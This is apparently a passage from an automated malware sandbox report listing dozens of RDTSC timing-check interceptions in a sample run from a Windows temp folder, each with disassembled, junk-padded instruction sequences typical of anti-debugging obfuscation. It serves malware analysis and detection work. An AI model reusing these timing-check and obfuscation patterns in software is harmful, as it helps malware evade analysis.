                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CAA22 second address: 6CAA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CADB5 second address: 6CADD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CAE50 second address: 6CAE66 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F69D121AB2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CAE66 second address: 6CAE70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CAE70 second address: 6CAE9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F69D121AB35h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jne 00007F69D121AB26h 0x0000001b pop esi 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CAE9C second address: 6CAECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F69D1080A50h 0x00000012 pop eax 0x00000013 push BA778F16h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CAFA9 second address: 6CAFC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CB0F2 second address: 6CB10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A57h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CB1D0 second address: 6CB1D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CB1D6 second address: 6CB1E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F69D1080A46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CB9E8 second address: 6CB9EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CB9EC second address: 6CBA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F69D1080A59h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CBA12 second address: 6CBA5E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov di, dx 0x0000000f mov dword ptr [ebp+124494B1h], eax 0x00000015 lea eax, dword ptr [ebp+1247F69Bh] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F69D121AB28h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 push ecx 0x00000036 add ecx, 4403DC91h 0x0000003c pop edi 0x0000003d movsx edi, cx 0x00000040 nop 0x00000041 push ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CBA5E second address: 6CBA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CBA62 second address: 6CBAF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push ebx 0x00000009 je 00007F69D121AB31h 0x0000000f jmp 00007F69D121AB2Bh 0x00000014 pop ebx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F69D121AB28h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 jmp 00007F69D121AB37h 0x00000035 lea eax, dword ptr [ebp+1247F657h] 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F69D121AB28h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 mov edx, dword ptr [ebp+122D28A0h] 0x0000005b mov ecx, dword ptr [ebp+122D29A0h] 0x00000061 nop 0x00000062 pushad 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CBAF0 second address: 6CBB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A4Eh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F8920 second address: 6F8927 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F8927 second address: 6F8943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007F69D1080A4Ch 0x0000000b jo 00007F69D1080A46h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F69D1080A46h 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F9170 second address: 6F91A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB35h 0x00000009 jmp 00007F69D121AB36h 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7006F5 second address: 700700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 700700 second address: 700706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 700706 second address: 700728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F69D1080A4Eh 0x0000000e jno 00007F69D1080A46h 0x00000014 pushad 0x00000015 popad 0x00000016 jnl 00007F69D1080A4Ch 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6FF511 second address: 6FF526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB2Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6FF69A second address: 6FF6AD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F69D1080A46h 0x00000008 jns 00007F69D1080A46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6FF962 second address: 6FF9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB2Fh 0x00000009 jmp 00007F69D121AB2Eh 0x0000000e popad 0x0000000f jo 00007F69D121AB2Ah 0x00000015 push eax 0x00000016 pop eax 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop edx 0x0000001a pushad 0x0000001b jmp 00007F69D121AB39h 0x00000020 push eax 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 pop eax 0x00000026 jmp 00007F69D121AB30h 0x0000002b push eax 0x0000002c push edx 0x0000002d jne 00007F69D121AB26h 0x00000033 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6FFDF8 second address: 6FFE03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7003AC second address: 7003B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7003B2 second address: 7003B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 70630A second address: 706328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 706328 second address: 706332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F69D1080A46h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 705132 second address: 705141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jl 00007F69D121AB26h 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 70547F second address: 705483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 705594 second address: 7055B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB37h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7055B4 second address: 7055B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7055B9 second address: 7055C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F69D121AB26h 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 705B96 second address: 705B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 705B9A second address: 705BB9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F69D121AB26h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F69D121AB26h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 705BB9 second address: 705BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 705BBD second address: 705BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Eh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 70499B second address: 70499F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 70499F second address: 7049AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F69D121AB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7049AF second address: 7049B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7049B5 second address: 7049B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7049B9 second address: 7049BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 70B2A8 second address: 70B2AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 70B2AE second address: 70B2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 70B2B7 second address: 70B2C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 70B2C4 second address: 70B2C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 712F26 second address: 712F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 71308A second address: 7130A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A54h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 71672C second address: 716732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 716732 second address: 716740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F69D1080A46h 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 716740 second address: 71677B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F69D121AB36h 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F69D121AB26h 0x00000017 jmp 00007F69D121AB33h 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 716B5E second address: 716B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 716B62 second address: 716B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 71A116 second address: 71A11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 71A11C second address: 71A122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 71A122 second address: 71A127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 71A127 second address: 71A13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D121AB2Fh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 71A69B second address: 71A6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 71A6A4 second address: 71A6A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 71A6A8 second address: 71A6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 720071 second address: 720075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 720075 second address: 720097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 720224 second address: 72022A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72022A second address: 720238 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F69D1080A46h 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72038F second address: 720397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7206A0 second address: 7206AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F69D1080A46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7206AC second address: 7206B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CB590 second address: 6CB596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CB596 second address: 6CB59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 726E3E second address: 726E5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F69D1080A46h 0x0000000d jne 00007F69D1080A46h 0x00000013 pop eax 0x00000014 pushad 0x00000015 je 00007F69D1080A46h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72711D second address: 727122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7276C3 second address: 7276D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F69D1080A48h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7276D0 second address: 7276F4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F69D121AB28h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F69D121AB33h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7276F4 second address: 7276FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7276FA second address: 727700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 727700 second address: 727705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 727705 second address: 72770D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 727F0A second address: 727F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A52h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 727F23 second address: 727F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7284F6 second address: 7284FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 7284FA second address: 72851B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72851B second address: 72851F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 72851F second address: 728528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 728528 second address: 728530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
